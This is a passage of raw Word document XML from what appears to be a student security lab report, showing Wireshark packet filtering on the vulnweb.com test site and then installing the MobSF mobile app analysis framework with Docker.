        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E76B7F5" wp14:editId="535688C7">
            <wp:extent cx="5733415" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="195210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02848" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586829B" w14:textId="7EB8719B" w:rsidR="004C1F59" w:rsidRDefault="004C1F59" w:rsidP="00EA299B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now if you have a look at this result set, you may be able to see there are a few exchanges that </w:t>
      </w:r>
      <w:r w:rsidR="00EA299B">
        <w:t xml:space="preserve">happened with this specific port. There </w:t>
      </w:r>
      <w:r w:rsidR="000335EC">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00EA299B">
        <w:t xml:space="preserve"> more such filter such as frames, if you are trying to have </w:t>
      </w:r>
      <w:r w:rsidR="000335EC">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00EA299B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA299B">
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA299B">
        <w:t xml:space="preserve"> or window frame popped up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA1665F" w14:textId="77777777" w:rsidR="00F47772" w:rsidRDefault="00EA299B">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">We can also search with domains like frame. There are multiple filters as such frame contains, say xyz.com. if I try to search it in this way, it will try to search all the frames which has this domain in it. In our case, the domain was </w:t>
      </w:r>
      <w:r w:rsidR="00F47772">
        <w:t xml:space="preserve">vulnweb.com. let’s try to filter such packages and see if wee has few. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34454A" w14:textId="77777777" w:rsidR="00F47772" w:rsidRDefault="00F47772"/>
    <w:p w14:paraId="3F380B55" w14:textId="3C9D60AF" w:rsidR="00F47772" w:rsidRDefault="00F47772">
      <w:r w:rsidRPr="00F47772">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C92DBCF" wp14:editId="65AD22CF">
            <wp:extent cx="5733415" cy="3067050"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="214452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21886" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3067050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AAAA9D" w14:textId="77777777" w:rsidR="00F47772" w:rsidRDefault="00F47772"/>
    <w:p w14:paraId="4F9EE5A9" w14:textId="77BD6226" w:rsidR="00EA299B" w:rsidRDefault="00F47772" w:rsidP="00F47772">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Yes, we do have nineteen of the packets that were sent or received from this specific domain. In this way, we will be able to filter out all the packet. We can go ahead and stop the scan and we can save this scan with some certain name. say let’s talk about the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnweb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and then we will save it with any name that</w:t>
      </w:r>
      <w:r w:rsidR="00692C09">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024A1ADC" w14:textId="77777777" w:rsidR="00692C09" w:rsidRDefault="00692C09" w:rsidP="00692C09"/>
    <w:p w14:paraId="2BDFA7ED" w14:textId="752B7FEC" w:rsidR="00692C09" w:rsidRDefault="00692C09" w:rsidP="00692C09">
      <w:r w:rsidRPr="00692C09">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D78642" wp14:editId="7D9B487F">
            <wp:extent cx="5733415" cy="2636520"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="174224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44852" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2636520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAE2A2" w14:textId="7179A32D" w:rsidR="00692C09" w:rsidRDefault="003470A7" w:rsidP="008E3F46">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We want to. Further we can go ahead and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ana</w:t>
      </w:r>
      <w:r w:rsidR="008E3F46">
        <w:t>lyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E3F46">
        <w:t xml:space="preserve"> each of these packets and see if there was any information what all information was transferred more to it has got some other information over here like what was the destination what was the source what was the type of protocol being used? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0440C348" w14:textId="77777777" w:rsidR="008E3F46" w:rsidRDefault="008E3F46" w:rsidP="00692C09"/>
    <w:p w14:paraId="14928AF0" w14:textId="5E7192A3" w:rsidR="008E3F46" w:rsidRDefault="008E3F46" w:rsidP="00692C09">
      <w:r w:rsidRPr="008E3F46">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46134E22" wp14:editId="6740E965">
            <wp:extent cx="5733415" cy="2848610"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="167174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4877" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2848610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72677C4A" w14:textId="77777777" w:rsidR="008E3F46" w:rsidRDefault="008E3F46" w:rsidP="00692C09"/>
    <w:p w14:paraId="4174926E" w14:textId="0D00BFE4" w:rsidR="008E3F46" w:rsidRDefault="008E3F46" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Now over here say we have the length of the packet and checksums what kind of checksums were used? Was it even getting verified? It says unverified. If you talk about the TCP metadata. It has everything like the source port which was opened and the destination port </w:t>
      </w:r>
      <w:r w:rsidR="000E7AF1">
        <w:t xml:space="preserve">as live suggested it was on port 80 because HTTP connects on port 80 by default. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C5F72" w14:textId="38081346" w:rsidR="000E7AF1" w:rsidRDefault="000E7AF1" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Now looking into it we do have the sequence numbers for the packet exchange that happened. </w:t>
      </w:r>
      <w:r w:rsidR="000335EC">
        <w:t>Yes,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in this way, you can go ahead and try to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the metadata you are trying to except from a packet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955AD6A" w14:textId="77777777" w:rsidR="000E7AF1" w:rsidRDefault="000E7AF1" w:rsidP="00692C09"/>
    <w:p w14:paraId="534F7B02" w14:textId="4F295519" w:rsidR="000E7AF1" w:rsidRDefault="000E7AF1" w:rsidP="00692C09">
      <w:r w:rsidRPr="000E7AF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39508BC2" wp14:editId="07441D60">
            <wp:extent cx="5733415" cy="2803525"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="130127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75226" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2803525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1D16D6" w14:textId="6C1F2B7B" w:rsidR="000335EC" w:rsidRPr="000335EC" w:rsidRDefault="000335EC" w:rsidP="000335EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Title: </w:t>
      </w:r>
      <w:r w:rsidRPr="000335EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textOutline w14:w="9525" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
            <w14:prstDash w14:val="solid"/>
            <w14:bevel/>
          </w14:textOutline>
        </w:rPr>
        <w:t>Mobile Application Testing Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C3F5C" w14:textId="103881D1" w:rsidR="000335EC" w:rsidRDefault="000335EC" w:rsidP="00692C09"/>
    <w:p w14:paraId="1B8A5633" w14:textId="2A337693" w:rsidR="000335EC" w:rsidRDefault="000335EC" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000335EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tool: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000335EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08E1C396" w14:textId="643DC480" w:rsidR="00342B1C" w:rsidRDefault="00755F3C" w:rsidP="00692C09">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is open source automated all in on mobile application security assessment framework. It supports both static and dynamic analysis of mobile applications to identify vulnerability and potential security risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B209C" w14:textId="77777777" w:rsidR="00755F3C" w:rsidRDefault="00755F3C" w:rsidP="00692C09"/>
    <w:p w14:paraId="62710DED" w14:textId="03D2B44E" w:rsidR="00755F3C" w:rsidRDefault="00EE5BAE" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">We are just going to install this today. And I do I did find a </w:t>
      </w:r>
      <w:r w:rsidR="00D90AB5">
        <w:t>GitHub repository with some test files and you know APKs. So, maybe I can download one of these and upload it once this is installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D32A68D" w14:textId="77777777" w:rsidR="00D90AB5" w:rsidRDefault="00D90AB5" w:rsidP="00692C09"/>
    <w:p w14:paraId="0062B574" w14:textId="2F73042B" w:rsidR="00D90AB5" w:rsidRDefault="00D90AB5" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidRPr="00F23EBE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/MobSF/Mobile-Security-Framework-MobSF</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="104E2246" w14:textId="77777777" w:rsidR="00D90AB5" w:rsidRDefault="00D90AB5" w:rsidP="00692C09"/>
    <w:p w14:paraId="59EC34E9" w14:textId="3B901FD9" w:rsidR="00D90AB5" w:rsidRDefault="00D90AB5" w:rsidP="00692C09">
      <w:r w:rsidRPr="00D90AB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23228A73" wp14:editId="05AAE62E">
            <wp:extent cx="5733415" cy="3762375"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="97883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38325" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13208CB7" w14:textId="77777777" w:rsidR="00D90AB5" w:rsidRDefault="00D90AB5" w:rsidP="00692C09"/>
    <w:p w14:paraId="6F37216E" w14:textId="07FFF477" w:rsidR="00D90AB5" w:rsidRDefault="00D90AB5" w:rsidP="00692C09">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">We can see how to use it. So quick setup with docker. This is all new for me. I never touched it. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> been on my now it just got put on my plate and now I have to learn it. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we are just going to go ahead and just copy and follow the </w:t>
      </w:r>
      <w:r w:rsidR="00125C2B">
        <w:t>yellow brick.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461FE93B" w14:textId="77777777" w:rsidR="00125C2B" w:rsidRDefault="00125C2B" w:rsidP="00692C09"/>
    <w:p w14:paraId="062E5292" w14:textId="042C77EE" w:rsidR="00125C2B" w:rsidRDefault="00125C2B" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Quick setup with docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BD86D9" w14:textId="77777777" w:rsidR="00125C2B" w:rsidRPr="00125C2B" w:rsidRDefault="00125C2B" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2271C6" w14:textId="77777777" w:rsidR="00125C2B" w:rsidRPr="00125C2B" w:rsidRDefault="00125C2B" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">docker pull </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>opensecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobile-security-framework-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobsf:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="56737E63" w14:textId="77777777" w:rsidR="00125C2B" w:rsidRPr="00125C2B" w:rsidRDefault="00125C2B" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run -it --rm -p 8000:8000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>opensecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobile-security-framework-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobsf:latest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27C4846B" w14:textId="77777777" w:rsidR="00125C2B" w:rsidRPr="00125C2B" w:rsidRDefault="00125C2B" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECD8C93" w14:textId="18F754EB" w:rsidR="00CE7725" w:rsidRDefault="00125C2B" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t># Default username and password:</w:t>
      </w:r>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125C2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74CA8904" w14:textId="77777777" w:rsidR="00CE7725" w:rsidRDefault="00CE7725" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05896B41" w14:textId="1A90A6DE" w:rsidR="00125C2B" w:rsidRDefault="009F35F6" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F35F6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A5E552F" wp14:editId="442CE8D3">
            <wp:extent cx="5733415" cy="3679825"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="190815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50006" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3679825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E9393" w14:textId="77777777" w:rsidR="009F35F6" w:rsidRDefault="009F35F6" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67716494" w14:textId="6320B4D3" w:rsidR="00125C2B" w:rsidRDefault="00CE7725" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Then go to browser and open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> web. Like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mobsf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidRPr="00F23EBE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8000</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FF837E2" w14:textId="77777777" w:rsidR="00CE7725" w:rsidRPr="00125C2B" w:rsidRDefault="00CE7725" w:rsidP="00125C2B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599A4017" w14:textId="2C007CA1" w:rsidR="00CE7725" w:rsidRDefault="00CE7725" w:rsidP="00692C09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE7725">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="512ADFB7" wp14:editId="4A3AD319">
            <wp:extent cx="5733415" cy="3800475"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="105343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30216" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3800475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F134763" w14:textId="43AEE090" w:rsidR="00CE7725" w:rsidRDefault="00CE7725" w:rsidP="00692C09">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Now the moment of truth upload and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. So</w:t>
      </w:r>
      <w:r w:rsidR="006336CC">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we are going to get some test. We are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006336CC">
        <w:t>gonna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:r w:rsidR="006336CC">
        <w:t>android</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006336CC">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="006336CC">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006336CC">
        <w:t>let’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> just come here and just download this and download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6680CAD4" w14:textId="77777777" w:rsidR="006336CC" w:rsidRDefault="006336CC" w:rsidP="00692C09"/>
